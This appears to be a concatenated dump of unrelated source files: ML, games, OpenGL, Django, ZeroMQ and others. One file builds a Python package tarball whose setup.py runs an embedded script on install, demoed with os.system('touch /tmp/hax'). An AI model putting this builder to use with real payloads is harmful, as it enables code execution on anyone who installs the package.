    rnaseqgspace = sys.argv[4]
    fastaoutpath = sys.argv[5]
    bedoutpath = sys.argv[6]
    # These six are module globals consumed by process().
    refFlat = shelve.open(refflatdbpath, 'r')
    mm9 = GiantFASTAFile(genomefastapath)
    rseqarr = MultiTrackSplitBinnedArray(rnaseqgspace)
    nrlist = open(nrlistpath).read().split()
    bedout = open(bedoutpath, 'w')
    faout = open(fastaoutpath, 'w')
    process(nrlist)
|
991,436 | 7f15a1c532d9a6f1d7aa4e255b381f2316219d31 | # -*- coding: utf-8 -*-
class Card:
    """A playing card from a 36-card deck (suits S/H/D/C, ranks 6..A)."""

    SUITS = ['S', 'H', 'D', 'C']
    RANKS = ['6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']
    SUITS_PRINTABLE = ['♠', '♥', '♦', '♣']

    def __init__(self, suit, rank):
        self.suit = suit
        self.rank = rank

    def __repr__(self):
        return self.rank + self.printable_suit(self.suit)

    def printable_suit(self, suit):
        """Map a suit letter ('S'/'H'/'D'/'C') to its unicode glyph."""
        idx = Card.SUITS.index(suit)
        return Card.SUITS_PRINTABLE[idx]

    def greaterThan(self, card):
        """True only for a strictly higher rank of the *same* suit."""
        if self.suit != card.suit:
            return False
        return Card.RANKS.index(self.rank) > Card.RANKS.index(card.rank)

    def sameRank(self, card):
        return self.rank == card.rank
|
991,437 | 184064077c31493900d49abe8e8fd49481c8e0c4 | '''
Created on Mar 27, 2019
@author: dsj529
'''
import numpy as np
import pandas as pd
from pandas.plotting import scatter_matrix
from matplotlib import pyplot as plt
from sklearn import model_selection, preprocessing
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.metrics import classification_report
from sklearn.metrics import accuracy_score
## Load Dataset
# Wisconsin breast-cancer data: 9 integer features plus a benign(2)/malignant(4) class.
url = "https://archive.ics.uci.edu/ml/machine-learning-databases/breast-cancer-wisconsin/breast-cancer-wisconsin.data"
names = ['id', 'clump_thickness', 'uniform_cell_size', 'uniform_cell_shape',
         'marginal_adhesion', 'single_epithelial_size', 'bare_nuclei',
         'bland_chromatin', 'normal_nucleoli', 'mitoses', 'class']
df = pd.read_csv(url, names=names)
## Preprocess the data
# '?' marks missing values; replace with a large sentinel treated as an outlier.
df.replace('?',-99999, inplace=True)
print(df.axes)
# The id column carries no predictive signal.
df.drop(['id'], 1, inplace=True)
#===================================================================================================
# ## inspect the dataset
# print(df.loc[10])
# print(df.shape)
# print(df.describe())
# df.hist(figsize=(10,10))
# plt.show()
# scatter_matrix(df, figsize=(18,18))
# plt.show()
#===================================================================================================
## prepare data for learning
X = np.array(df.drop(['class'], 1))
y = np.array(df['class'])
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.2)
## set up the classifiers
scoring = 'accuracy'
models = []
models.append(('KNN', KNeighborsClassifier(n_neighbors=5)))
models.append(('SVM', SVC(gamma='scale')))
results=[]
names=[]
# 10-fold cross-validated accuracy on the training split for each model.
for name, model in models:
    kfold=model_selection.KFold(n_splits=10)
    cv_results = model_selection.cross_val_score(model, X_train, y_train, cv=kfold, scoring=scoring)
    results.append(cv_results)
    names.append(name)
    msg = '{}: {:f} ({:f})'.format(name, cv_results.mean(), cv_results.std())
    print(msg)
## predict on test/validation set
for name, model in models:
    model.fit(X_train, y_train)
    preds = model.predict(X_test)
    print(name)
    print(accuracy_score(y_test, preds))
    print(classification_report(y_test, preds))
991,438 | b2822f2b6386413e7fc2bc143befa5f1de55d9d8 | import random
def guess():
    """Pick a random number in [1, 20] and prompt on stdin until guessed,
    printing 'Too low.'/'Too high.' hints and 'Good job.' on success."""
    number = random.randint(1, 20)
    while True:
        print('Take a guess')
        attempt = int(input())
        if attempt < number:
            print('Too low.')
        elif attempt > number:
            print('Too high.')
        else:
            break
    print('Good job.')
# Entry point: announce the game, then run one round.
print('I am thinking of a number between 1 and 20.')
guess()
|
991,439 | 2a82b2c70ea7f3e3472c0a03069dad0222774c06 | import os
# Input listing (one EDF path per line) and output name template; 'hosp'
# in the template is replaced by '<hospital><split-index>'.
to_split_fn = '/afs/csail.mit.edu/u/t/tzhan/eeg/patient_file_lists/largest/patient_largest_files_whole.txt'
output_fn = '/afs/csail.mit.edu/u/t/tzhan/eeg/patient_file_lists/largest/hosp_largest_files.txt'
# Number of files to split each hospital into
split_n = 2
def chunkIt(seq, num):
    """Split `seq` into `num` consecutive, nearly equal slices.

    Uses a fractional step so the slice boundaries distribute any
    remainder evenly across the chunks.
    """
    step = len(seq) / float(num)
    total = len(seq)
    parts = []
    cursor = 0.0
    while cursor < total:
        parts.append(seq[int(cursor):int(cursor + step)])
        cursor += step
    return parts
def write_splits(hospital_files, hospital_name):
    """Write `hospital_files` into `split_n` list files; each output path
    is `output_fn` with 'hosp' replaced by '<hospital_name><index>'."""
    for index, chunk in enumerate(chunkIt(hospital_files, split_n)):
        filepath = output_fn.replace('hosp', '{}{}'.format(hospital_name, index))
        with open(filepath, 'w') as f:
            f.writelines(chunk)
# Bucket every line by the hospital tag embedded in its path, then split
# each bucket into `split_n` output list files.  Python 2 (print statement).
with open(to_split_fn) as f:
    lines = f.readlines()
mgh = []
bi = []
yale = []
bwh = []
for line in lines:
    if 'CA_MGH' in line:
        mgh.append(line)
    elif 'CA_BIDMC' in line:
        bi.append(line)
    elif 'ynh' in line:
        yale.append(line)
    elif 'bwh' in line:
        bwh.append(line)
    else:
        print 'not a proper edf', line
write_splits(mgh, 'mgh')
write_splits(bi, 'bi')
write_splits(yale, 'yale')
write_splits(bwh, 'bwh')
|
991,440 | 5f381e7fde408830df2c4f73bf3137d4c5ad6e79 | import uhal
# IPbus/uHAL hardware access; requires connection.xml next to the script.
uhal.disableLogging()
hw_man = uhal.ConnectionManager("file://connection.xml")
amc13 = hw_man.getDevice("amc13")
# reset AMC13 (necessary for daq link to be ready after reset of WFD)
amc13.getNode("CONTROL0").write(0x1)
# dispatch() flushes the queued IPbus transactions to the board.
amc13.dispatch()
|
991,441 | 94e10aab9145a2b9e206e211a7c812d0a9303002 | #! /usr/bin/env python
from __future__ import print_function
from PyQt4 import QtCore,QtGui
from PyQt4.QtOpenGL import *
from OpenGL.GL import *
from OpenGL.GLU import *
import time
import numpy
import math
import os, sys
import Texture
def distance(x1, y1, x2, y2):
    """Return the Euclidean distance between points (x1, y1) and (x2, y2).

    math.hypot is clearer and numerically more robust than the manual
    sqrt(dx*dx + dy*dy) for very large or very small coordinates.
    """
    return math.hypot(x1 - x2, y1 - y2)
class BlendGL(QGLWidget):
    """Qt OpenGL widget implementing a soft round paint brush over a
    single-channel (alpha) 512x512 mask texture drawn on a white quad.

    Controls: mouse drag paints, Up/Down changes brush size, Left/Right
    changes softness, Space toggles paint/erase mode.
    """
    def __init__(self, parent):
        QGLWidget.__init__(self, parent)
        self.setMouseTracking(True)
        self.isPressed = False
        self.oldx = self.oldy = 0
        self.nearest = -1
        self.startTime = float(time.time())
        # Dimensions of the editable mask texture.
        self.warpWidth = 512
        self.warpHeight = 512
        self.border = 0.0
        self.texID = 0
        self.brushSize = 30.0
        self.brushSoftness = 1.0
        # False: darken toward 255 (paint); True: scale existing values
        # toward 0 (see manipulatePixel).
        self.brushMode = False
        self.brushImage = None
        self.updateBrushImage()
        # Stroke distance carried over between mouse events so brush
        # stamps stay evenly spaced across event boundaries.
        self.leftOverDistance = 0
    def updateBrushImage(self):
        # Precompute the square alpha-falloff stamp for the current
        # brush size and softness.
        size = int(math.ceil(self.brushSize))
        self.brushImage = numpy.zeros(size*size,numpy.uint8)
        r = self.brushSize * 0.5
        # NOTE(review): the C snippet quoted above drawLine computes
        # softness * (0.5 - radius) + radius; the 0.5 term is absent here
        # — confirm this simplification is intentional.
        innerRadius = self.brushSoftness * ( - r) + r
        for x in range(0,size):
            for y in range(0,size):
                d = distance(x,y,r,r)
                # Linear ramp from innerRadius (0) to outer radius (1).
                v = (d - innerRadius) / (r - innerRadius)
                if v < 0.0: v = 0.0
                if v > 1.0: v = 1.0
                self.brushImage[y*size+x] = v * 255
    def paintGL(self):
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        glDisable( GL_DEPTH_TEST )
        glDisable( GL_CULL_FACE )
        # Texture not created yet (initializeGL has not run).
        if self.texID == 0: return
        glLoadIdentity()
        glMatrixMode(GL_PROJECTION)
        glLoadIdentity()
        left, right, top, bottom = self.viewRect()
        gluOrtho2D(left,right,top,bottom)
        glMatrixMode(GL_MODELVIEW)
        glLoadIdentity()
        # White background quad.
        glBegin(GL_QUADS)
        glColor4f(1.0,1.0,1.0,1.0)
        glTexCoord2f(0.0, 0.0); glVertex2f(-0.5,-0.5)
        glTexCoord2f(1.0, 0.0); glVertex2f(0.5,-0.5)
        glTexCoord2f(1.0, 1.0); glVertex2f(0.5,0.5)
        glTexCoord2f(0.0, 1.0); glVertex2f(-0.5,0.5)
        glEnd()
        # Mask texture blended on top in black, alpha from the texture.
        glEnable(GL_TEXTURE_2D)
        glBindTexture(GL_TEXTURE_2D, self.texID)
        glColor4f(0.0,0.0,0.0,1.0)
        glBlendFunc (GL_SRC_ALPHA,GL_ONE_MINUS_SRC_ALPHA)
        glTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_MODULATE)
        glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S,GL_CLAMP_TO_EDGE);
        glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T,GL_CLAMP_TO_EDGE);
        glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
        glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
        # Re-upload the (possibly just edited) mask every frame.
        self.updateTex()
        glBegin(GL_QUADS)
        #glColor4f(1.0,1.0,1.0,1.0)
        glTexCoord2f(0.0, 0.0); glVertex2f(-0.5,-0.5)
        glTexCoord2f(1.0, 0.0); glVertex2f(0.5,-0.5)
        glTexCoord2f(1.0, 1.0); glVertex2f(0.5,0.5)
        glTexCoord2f(0.0, 1.0); glVertex2f(-0.5,0.5)
        glEnd()
        glBindTexture(GL_TEXTURE_2D, 0)
        glColor4f(1.0,1.0,1.0,1.0)
        # Brush outline circle drawn with an inverting blend so it stays
        # visible over both dark and light areas.
        posx,posy = self.screenPos()
        glEnable(GL_BLEND);
        glBlendFunc(GL_ONE_MINUS_DST_COLOR, GL_ZERO);
        glBegin(GL_LINE_LOOP)
        n = 16
        r = self.brushSize*0.5 / self.warpWidth
        for i in range(0,n):
            glVertex2f(posx+
                r*math.cos(i/float(n)*math.pi*2),posy+
                r*math.sin(i/float(n)*math.pi*2) * (self.warpWidth/float(self.warpHeight)) )
        glEnd()
        # Schedule a continuous repaint.
        self.update()
        #glFlush()
    def resizeGL(self, widthInPixels, heightInPixels):
        glViewport(0, 0, widthInPixels, heightInPixels)
    def viewRect(self):
        # Compute the orthographic view rectangle, letterboxing so the
        # texture keeps its aspect ratio inside the widget.
        warpAspect = float(self.warpWidth) / self.warpHeight
        viewAspect = float(self.width()) / self.height()
        b = self.border * 0.5
        left, right, top, bottom = -0.5 - b,0.5 + b,-0.5 - b,0.5 + b
        if warpAspect > viewAspect:
            top *= warpAspect / viewAspect
            bottom *= warpAspect / viewAspect
        else:
            left *= viewAspect / warpAspect
            right *= viewAspect / warpAspect
        return left, right, top, bottom
    def initializeGL(self):
        glClearColor(0.0, 0.0, 0.0, 1.0)
        glClearDepth(1.0)
        glEnable(GL_TEXTURE_2D)
        glEnable(GL_BLEND)
        # One byte per texel: the mask is a single alpha channel.
        self.texID = glGenTextures(1)
        self.texData = numpy.zeros((self.warpWidth*self.warpHeight),numpy.uint8)
        glBindTexture(GL_TEXTURE_2D, self.texID)
        glPixelStorei(GL_UNPACK_ALIGNMENT,1)
        glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP)
        glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP)
        self.updateTex()
        glBindTexture(GL_TEXTURE_2D,0)
    def updateTex(self):
        # Upload texData as an alpha-only texture.
        glTexImage2D(
            GL_TEXTURE_2D, 0, GL_ALPHA, self.warpWidth, self.warpHeight, 0,
            GL_ALPHA, GL_UNSIGNED_BYTE, self.texData)
    def mouseMoveEvent(self, e):
        # While pressed, stamp the brush along the segment from the last
        # cursor position; remember the unspent distance for next time.
        if self.isPressed:
            self.leftOverDistance = self.drawLine(self.oldx,self.oldy,e.x(),e.y(),self.leftOverDistance)
        self.oldx = e.x()
        self.oldy = e.y()
        self.update()
    def keyPressEvent(self,e):
        self.update()
        if e.key() == QtCore.Qt.Key_Left:
            self.brushSoftness -= 0.01
        elif e.key() == QtCore.Qt.Key_Right:
            self.brushSoftness += 0.01
        elif e.key() == QtCore.Qt.Key_Up:
            self.brushSize += 1
        elif e.key() == QtCore.Qt.Key_Down:
            self.brushSize -= 1
        elif e.key() == QtCore.Qt.Key_Space:
            self.brushMode = not self.brushMode
        # Any parameter change invalidates the precomputed stamp.
        self.updateBrushImage()
        print(self.brushSize,self.brushSoftness)
    def mousePressEvent(self, e):
        # Start a stroke with a single stamp at the press position.
        self.isPressed = True
        p1x,p1y = self.pixelPos(e.x(),e.y())
        self.leftOverDistance = 0.0
        self.manipulatePixel(p1x,p1y)
        self.oldx = e.x()
        self.oldy = e.y()
        self.update()
    #int innerRadius = (int)ceil(mSoftness * (0.5 - mRadius) + mRadius);
    #int outerRadius = (int)ceil(mRadius);
    #float alphaStep = 1.0 / (outerRadius - innerRadius + 1);
    def drawLine(self,p1x,p1y,p2x,p2y,leftOverDistance):
        # Stamp the brush at even spacing along the widget-space segment
        # (p1, p2); returns the distance left over for the next segment.
        p1x,p1y = self.pixelPos(p1x,p1y)
        p2x,p2y = self.pixelPos(p2x,p2y)
        # Anything less that half a pixel is overkill and could hurt performance.
        spacing = self.brushSize / 10.0
        if spacing < 0.5 : spacing = 0.5
        deltaX = p2x - p1x;
        deltaY = p2y - p1y;
        dist = distance(p1x,p1y,p2x,p2y)
        stepX = 0.0
        stepY = 0.0
        if dist > 0.0 :
            invertDistance = 1.0 / dist
            stepX = deltaX * invertDistance
            stepY = deltaY * invertDistance
        offsetX = 0.0
        offsetY = 0.0
        totalDistance = leftOverDistance + dist
        # While we still have distance to cover, stamp
        while totalDistance >= spacing :
            if leftOverDistance > 0:
                # First stamp completes the spacing begun in the previous event.
                offsetX += stepX * (spacing - leftOverDistance)
                offsetY += stepY * (spacing - leftOverDistance)
                leftOverDistance -= spacing
            else:
                offsetX += stepX * spacing
                offsetY += stepY * spacing
            self.manipulatePixel(p1x + offsetX,p1y + offsetY)
            totalDistance -= spacing
        return totalDistance
    def manipulatePixel(self,x,y):
        # Apply one brush stamp centered at texture coordinate (x, y),
        # clipping against the texture bounds.
        r = self.brushSize*0.5
        size = int(math.ceil(self.brushSize))
        for i in range(0,size):
            for j in range(0,size):
                posx = int(i + x - r)
                posy = int(j + y - r)
                if (posx < 0) or (posx >= self.warpWidth): continue
                if (posy < 0) or (posy >= self.warpHeight): continue
                idx = posy*self.warpWidth+posx
                # Stamp value in [0, 1]; 0 at the brush center.
                v = self.brushImage[j*size + i]/255.0
                if self.brushMode:
                    # Erase: scale the existing value toward 0.
                    pix= self.texData[idx] * v
                else:
                    # Paint: blend toward 255 at the brush center.
                    pix= 255.0 - 255.0*v + self.texData[idx] * v
                self.texData[idx] = pix
    def mouseReleaseEvent(self, e):
        self.isPressed = False
        self.leftOverDistance = 0.0
        self.update()
    def toScreenPos(self,x,y):
        # Widget pixel -> orthographic view coordinates (y flipped).
        left, right, top, bottom = self.viewRect()
        width = right - left
        height = bottom - top
        return ((float(x) / self.width() - 0.5) * width,(1.0 - float(y) / self.height() - 0.5) * height)
    def screenPos(self):
        return self.toScreenPos(self.oldx,self.oldy)
    def pixelPos(self,px,py):
        # Widget pixel -> integer texel coordinates in the mask texture.
        x,y = self.toScreenPos(px,py)
        return (int(float(x+0.5)*self.warpWidth),int(float(y+0.5)*self.warpHeight))
if __name__ == '__main__':
    # Minimal Qt bootstrap: show the widget and enter the event loop.
    app = QtGui.QApplication(['WarpTest'])
    window = BlendGL(None)
    window.show()
    sys.exit(app.exec_())
|
991,442 | 4c15792d1105b57e5e11042bc7949ad77b8bff32 | import io
import tarfile
import textwrap
import sys
SCRIPT_TEMPLATE= """#!/usr/bin/env python
from distutils.core import setup
setup(name='{name}',
version='1.0',
)
try:
{script}
except Exception as e:
print(e)
"""
DEFAULT_SCRIPT = """print(42)"""
def build_setup(script, name):
    """Render the setup.py source with `script` nested inside its try block."""
    body = textwrap.indent(script, ' ')
    return SCRIPT_TEMPLATE.format(script=body, name=name)
def wrap_in_tarball(filename, contents):
    """Return gzipped-tar bytes containing the single member `filename`
    whose body is `contents` encoded as UTF-8."""
    payload = contents.encode('utf-8')
    info = tarfile.TarInfo(name=filename)
    info.size = len(payload)
    sink = io.BytesIO()
    archive = tarfile.open(mode='w:gz', fileobj=sink)
    archive.addfile(info, fileobj=io.BytesIO(payload))
    archive.close()
    return sink.getvalue()
def build_pkg(script=DEFAULT_SCRIPT, name="foo"):
    """Build a `<name>-1.0` source-distribution tarball whose setup.py
    executes `script` during install."""
    member_path = "{}-1.0/setup.py".format(name)
    return wrap_in_tarball(member_path, build_setup(script, name))
if __name__ == "__main__":
    # Demo payload: proves code execution by touching a marker file.
    script="""
import os
os.system("touch /tmp/hax")
"""
    tar = build_pkg(script)
    # Emit the raw tarball bytes on stdout.
    sys.stdout.buffer.write(tar)
|
991,443 | 485609f6d3dc345b05149c00ee62e2c6e41b7fd0 | n = int(input())
# Like-propagation toy model: start with 5 viewers; each round half of
# them (integer division) like the video, and every like recruits 3 new
# viewers for the next round.
initial = 5
total = 0
for i in range(n):
    liked = initial//2
    total+=liked
    initial = liked*3
# NOTE(review): if n == 0 `liked` is unbound here — confirm n >= 1.
print(initial,liked,total)
|
991,444 | 5a02ed9788a12d065aca99c098dec2579f7e0c6f | import json
import requests
from song import Song
class SpotifyRecom:
    """Thin Spotify Web API client: recently played tracks and
    track recommendations, authenticated with a bearer token."""

    def __init__(self, token):
        self.token = token

    def get_last_played_tracks(self, limit=10):
        """Return up to `limit` of the user's recently played Songs."""
        url = f"https://api.spotify.com/v1/me/player/recently-played?limit={limit}"
        payload = self._place_get_api_request(url).json()
        return [
            Song(item["track"]["name"], item["track"]["id"],
                 item["track"]["artists"][0]["name"])
            for item in payload["items"]
        ]

    def get_track_recommendations(self, seed_tracks, limit=10):
        """Return up to `limit` Songs recommended from `seed_tracks`."""
        seed_tracks_url = ",".join(track.id for track in seed_tracks)
        url = f"https://api.spotify.com/v1/recommendations?seed_tracks={seed_tracks_url}&limit={limit}"
        payload = self._place_get_api_request(url).json()
        return [
            Song(track["name"], track["id"], track["artists"][0]["name"])
            for track in payload["tracks"]
        ]

    def _place_get_api_request(self, url):
        """GET `url` with JSON/bearer-token headers; returns the response."""
        headers = {
            "Content-Type": "application/json",
            "Authorization": f"Bearer {self.token}"
        }
        return requests.get(url, headers=headers)

    def _place_post_api_request(self, url, data):
        """POST `data` to `url` with JSON/bearer-token headers."""
        headers = {
            "Content-Type": "application/json",
            "Authorization": f"Bearer {self.token}"
        }
        return requests.post(url, data=data, headers=headers)
991,445 | 33bcab25b344966d173bbce74e37cbd3bb29b72e | from __future__ import unicode_literals
from django.utils.encoding import python_2_unicode_compatible
from django.db import models
from django.contrib.postgres.fields import ArrayField
import os
@python_2_unicode_compatible
class Classes(models.Model):
    """A class/form group, keyed by its letter-and-year code."""
    letter_yr = models.CharField(max_length=2, primary_key=True)
    def __str__(self):
        return self.letter_yr
@python_2_unicode_compatible
class Courses(models.Model):
    """A taught course, keyed by its course code."""
    code = models.CharField(max_length=200, primary_key=True)
    title = models.CharField(max_length=200)
    lecturer = models.ForeignKey('People', on_delete=models.PROTECT)
    def __str__(self):
        return self.code + " " + self.title
@python_2_unicode_compatible
class People(models.Model):
    """A person (student, tutor or lecturer), keyed by login name."""
    login = models.CharField(max_length=200, primary_key=True)
    firstname = models.CharField(max_length=200)
    lastname = models.CharField(max_length=200)
    # Null for non-students.
    student_letter_yr = models.ForeignKey(Classes, on_delete=models.PROTECT, null=True)
    # Self-reference: this person's personal tutor.
    tutor = models.ForeignKey('self', on_delete=models.PROTECT, null=True)
    required_courses = models.ManyToManyField(Courses, related_name='required')
    registered_courses = models.ManyToManyField(Courses, related_name='registered')
    def __str__(self):
        return self.login
@python_2_unicode_compatible
class Term(models.Model):
    """An academic term, keyed by its ordinal number."""
    term = models.IntegerField(primary_key=True)
    name = models.CharField(max_length=200)
    def __str__(self):
        return self.term.__str__() + ": " + self.name
@python_2_unicode_compatible
class Courses_Term(models.Model):
    """Join table: which terms a course runs in."""
    code = models.ForeignKey(Courses, on_delete=models.PROTECT)
    term = models.ForeignKey(Term, on_delete=models.PROTECT)
    def __str__(self):
        return self.code.__str__() + " " + self.term.__str__()
@python_2_unicode_compatible
class Courses_Classes(models.Model):
    """Join table: which class groups take a course."""
    code = models.ForeignKey(Courses, on_delete=models.PROTECT)
    letter_yr = models.ForeignKey(Classes, on_delete=models.PROTECT)
    def __str__(self):
        return self.code.__str__() + " " + self.letter_yr.__str__()
@python_2_unicode_compatible
class Exercises(models.Model):
    """An assessed piece of work (coursework, exam, tutorial, ...) for a
    course, unique per (course, exercise number)."""
    code = models.ForeignKey(Courses, on_delete=models.PROTECT)
    number = models.IntegerField()
    title = models.CharField(max_length=200)
    start_date = models.DateTimeField()
    deadline = models.DateTimeField()
    # Exercise kinds.
    COURSEWORK = 'CW'
    PROJECT = 'PROJ'
    REPORT = 'REP'
    TEST = 'T'
    EXAM = 'WES'
    TUTORIAL = 'TUT'
    TYPE_CHOICES = (
        (COURSEWORK, 'Coursework'),
        (PROJECT, 'Project'),
        (REPORT, 'Report'),
        (TEST, 'Test'),
        (EXAM, 'Exam'),
        (TUTORIAL, 'Tutorial'),
    )
    NO = 'NO'
    INDIVIDUAL = 'INDIVIDUAL'
    GROUP = 'GROUP'
    ASSESSMENT_CHOICES = (
        (NO, 'No Assessment'),
        (INDIVIDUAL, 'Individual'),
        (GROUP, 'Group'),
    )
    HARDCOPY = 'HARDCOPY'
    ELECTRONIC = 'ELECTRONIC'
    SUBMISSION_CHOICES = (
        (NO, 'No submission'),
        (HARDCOPY, 'Hardcopy'),
        (ELECTRONIC, 'Electronic'),
    )
    exercise_type = models.CharField(
        max_length=15,
        choices=TYPE_CHOICES,
    )
    assessment = models.CharField(
        max_length=15,
        choices=ASSESSMENT_CHOICES,
        default=NO,
    )
    submission = models.CharField(
        max_length=15,
        choices=SUBMISSION_CHOICES,
        default=NO,
    )
    # Fixed: default=[] was a shared mutable default (every row would alias
    # one list object); Django requires a callable for mutable defaults.
    esubmission_files_names = ArrayField(models.CharField(max_length=50), default=list)
    mark_release_date = models.DateTimeField(null=True)
    class Meta:
        unique_together = (('code', 'number'),)
    def __str__(self):
        return self.code.code + " " + self.number.__str__() + " " + self.title + ": " + self.start_date.__str__() + " ~ " + self.deadline.__str__()
@python_2_unicode_compatible
class Period(models.Model):
    """A named date range in the academic calendar."""
    period = models.IntegerField(primary_key=True)
    name = models.CharField(max_length=200)
    start_date = models.DateField()
    end_date = models.DateField()
    def __str__(self):
        # Fixed: self.period is an int, so the original "self.period.name"
        # raised AttributeError; the name lives on the model itself.
        return self.period.__str__() + " " + self.name + ": " + self.start_date.__str__() + " ~ " + self.end_date.__str__()
@python_2_unicode_compatible
class Resource(models.Model):
    """An uploaded file plus its last-modified timestamp."""
    file = models.FileField(upload_to='')
    timestamp = models.DateTimeField(auto_now=True)
    def filename(self):
        """Base name of the stored file (path stripped)."""
        return os.path.basename(self.file.name)
    def __str__(self):
        return self.file.name + " " + self.timestamp.__str__()
@python_2_unicode_compatible
class Courses_Resource(models.Model):
    """A course material: either an uploaded file (resource) or an
    external link, typed by course_resource_type."""
    code = models.ForeignKey(Courses, on_delete=models.PROTECT)
    title = models.CharField(max_length=200)
    # Exactly one of resource/link is expected to be set.
    resource = models.ForeignKey(Resource, on_delete=models.CASCADE, null=True)
    link = models.URLField(null=True)
    release_date = models.DateField()
    NOTE = 'NOTE'
    PROBLEM = 'PROBLEM'
    URL = 'URL'
    PANOPTO = 'PANOPTO'
    PIAZZA = 'PIAZZA'
    HOMEPAGE = 'HOMEPAGE'
    TYPE_CHOICES = (
        (NOTE, 'Note'),
        (PROBLEM, 'Problem'),
        (URL, 'Url'),
        (PANOPTO, 'Panopto'),
        (PIAZZA, 'Piazza'),
        (HOMEPAGE, 'Homepage'),
    )
    course_resource_type = models.CharField(
        max_length=15,
        choices=TYPE_CHOICES,
        default=NOTE,
    )
    def __str__(self):
        return self.code.__str__() + " " + self.resource.__str__()
@python_2_unicode_compatible
class Exercises_Resource(models.Model):
    """A file attached to an exercise (spec, data, answer or marking scheme)."""
    exercise = models.ForeignKey(Exercises, on_delete=models.PROTECT)
    resource = models.ForeignKey(Resource, on_delete=models.CASCADE)
    SPECIFICATION = 'SPEC'
    DATA = 'DATA'
    ANSWER = 'ANSWER'
    MARKING = 'MARKING'
    TYPE_CHOICES = (
        (SPECIFICATION, 'Specification'),
        (DATA, 'Data file'),
        (ANSWER, 'Model answer'),
        (MARKING, 'Marking scheme'),
    )
    exercise_resource_type = models.CharField(
        max_length=15,
        choices=TYPE_CHOICES,
        default=SPECIFICATION,
    )
    def __str__(self):
        return self.exercise.__str__() + " " + self.resource.__str__()
@python_2_unicode_compatible
class Submissions(models.Model):
    """A (possibly group) submission for an exercise: leader, members and
    the uploaded files; timestamp auto-updates on save."""
    exercise = models.ForeignKey(Exercises, on_delete=models.PROTECT)
    leader = models.ForeignKey(People, on_delete=models.PROTECT, related_name='leader')
    members = models.ManyToManyField(People, related_name='members')
    files = models.ManyToManyField(Resource)
    timestamp = models.DateTimeField(auto_now=True)
    def __str__(self):
        return self.exercise.code.code + " " + self.exercise.number.__str__() + " " + self.leader.__str__() + self.members.all().__str__()
@python_2_unicode_compatible
class Marks(models.Model):
    """A single person's mark for one exercise."""
    exercise = models.ForeignKey(Exercises, on_delete=models.PROTECT)
    login = models.ForeignKey(People, on_delete=models.PROTECT)
    mark = models.DecimalField(max_digits=5, decimal_places=2)
    def __str__(self):
        return self.login.__str__() + " " + self.exercise.code.code + " " + self.exercise.number.__str__() + " " + self.mark.__str__()
|
991,446 | 4db9f5dd32f67d70e42e20a62bf70db08ccb2fa6 | '''
Created on Aug 25, 2014
@author: Changlong
'''
import zmq
import threading
import struct
import logging
import datetime
import time
import traceback
from twisted.internet import threads
from twisted.internet.defer import DeferredLock
from DB import SBDB, SBDB_ORM
# from SBPS import ProtocolReactor
from Utils import Util, Config
import Command
from Command import RedirectNotify
# ZeroMQ pub/sub port shared by all servers.
PORT_PUBSUB = 5557
# Terminal-type tags: first field of the '|'-separated message head.
TTYPE_GATEWAY = b'g'
TTYPE_HUMAN = b'h'
TTYPE_SERVER = b's'
TTYPE_ONLINEOFFLINE = b'o'
TTYPE_MANAGEMENT = b'm'
# Operation codes carried in the message head.
OPER_ONLINE = b'on'
OPER_OFFLINE = b'off'
OPER_REQUEST = b'req'
OPER_RESPONSE = b'res'
OPER_REDIRECT = b'direct'
OPER_LOAD = b'load'
OPER_SIMPLECONTROL = b'sc'
OPER_SIMPLECONTROLRESP = b'scr'
# ZeroMQ context and sockets, initialised elsewhere (see Run()).
context = None
socketSubscribe = None
socketPublish = None
listSubscribedServer = []
# Serializes sends on the shared pub socket.
lockPublish = DeferredLock()
protocolInternal = None
# online status,map of relayer_id-->CConnectionIterm
dictRelayerServer = {}
# online status,map of client_id-->CConnectionIterm
dictClientServer = {}
# server connection count, map of server_id-->connection count
dictServerLoad = {}
# server information, map of server_id-->ip address
dictServerInfo = {}
# Identity of this server, filled in by AddSubscribeServer().
MyServerID = 0
MyServerAddress = Config.domain_name
MyServerType = SBDB.CV_TYPE_SERVER_FUNCTION
# Guards the dict* online-status maps above.
lockMaps = threading.RLock()
Max_Server_Load = 5000
def str_to_bytes(o):
    """UTF-8 encode `o` if it is a str; any other value passes through."""
    return o.encode('utf-8') if isinstance(o, str) else o
def bytes_to_str(o):
    """UTF-8 decode `o` if it is bytes; any other value passes through."""
    return o.decode('utf-8') if isinstance(o, bytes) else o
def AddSubscribeServer(listServer, serverType=SBDB.CV_TYPE_SERVER_FUNCTION):
    """Subscribe to every not-yet-subscribed peer server and record it.

    `listServer` rows look like (server_id, ip, address).  If a row's IP
    belongs to this machine, remember our own id/address and (unless we
    are a supervision server) adopt `serverType`.
    """
    global MyServerID, MyServerAddress, MyServerType, dictServerInfo
    listMyIPs = Util.GetMachineIPs()
    for server in listServer:
        if server[1] not in listSubscribedServer:
            socketSubscribe.connect("tcp://%s:%d" % (server[1], PORT_PUBSUB))
            listSubscribedServer.append(server[1])
            dictServerInfo[server[0]] = server[2]
        if server[1] in listMyIPs:
            MyServerID = server[0]
            MyServerAddress = server[1]
            if MyServerType != SBDB.CV_TYPE_SERVER_SUPERVISION:
                MyServerType = serverType
def PublishMessageCallback(lock, data):
    """DeferredLock callback: send `data` (head, from, body) as a zmq
    multipart message, always releasing the lock afterwards."""
    try:
        # Normalise all three frames to bytes before sending.
        data = list(map(str_to_bytes, data))
        socketPublish.send_multipart(data)
        print("data sent of InternalMessage %s:%s:%s (%s%s%s)" %
              (data[0], data[1], data[2], Util.asscii_string(data[0]),
               Util.asscii_string(data[1]), Util.asscii_string(data[2])))
    except:
        print(traceback.format_exc())
    finally:
        lock.release()
def PublishMessage(head, fromInfo, body):
    """Queue (head, fromInfo, body) for publication; the DeferredLock
    serializes concurrent sends on the shared pub socket."""
